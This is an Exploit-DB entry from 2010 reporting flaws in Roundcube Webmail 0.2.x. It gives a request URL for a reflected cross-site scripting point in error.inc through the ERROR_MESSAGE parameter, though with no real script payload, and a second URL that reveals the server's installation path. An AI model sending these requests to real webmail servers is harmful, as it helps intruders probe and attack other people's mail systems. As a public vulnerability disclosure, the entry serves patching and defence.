Roundcube Webmail - Multiple Vulnerabilities

EDB-ID:

11036

CVE:

N/A


Platform:

PHP

Published:

2010-01-06

# Exploit Title: RoundCube Webmail XSS Voulerability
# Date: 6.01.2010
# Author: j4ck & Globus from elitehackers.pl
# Software Link: Software link : http://roundcube.net/download
# Version: 0.2.X , | possible voulerability in higher versions.
# Tested on: *
# Code :

XSS:

http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123

We can get FPD or roundcube installation path via:

http://www.[somesite.com]/webmail/program/steps/settings/identities.inc